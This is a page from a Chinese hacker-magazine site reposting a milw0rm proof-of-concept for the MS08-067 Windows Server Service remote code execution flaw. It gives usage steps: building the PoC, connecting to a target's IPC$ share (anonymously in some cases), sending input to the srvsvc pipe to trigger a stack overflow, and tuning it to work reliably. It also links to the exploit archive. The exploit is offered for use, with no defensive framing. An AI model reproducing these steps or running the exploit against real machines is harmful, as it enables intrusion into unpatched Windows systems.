黑客防线,在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!

设为首页
收藏本站
联系我们
网站导航

黑客文章 - 黑客漏洞分析 - 浏览 - MS Windows Server Service Code Execution PoC (MS08-067)

MS Windows Server Service Code Execution PoC (MS08-067)

黑客 发布日期:2008-10-25 0:03:46 共有 619 人次浏览
MS Windows Server Service Code Execution PoC (MS08-067)
In vstudio command prompt:

mk.bat

next:

attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc

In some cases, /user:"" "", will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
nothing.

This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.

So play around a bit, you'll get it working reliably...

poc:
http://milw0rm.com/sploits/2008-ms08-067.zip

# milw0rm.com [2008-10-23]

所属分类: 黑客漏洞分析     网摘收藏: Google 雅虎 百度 POCO 365key 和讯 天极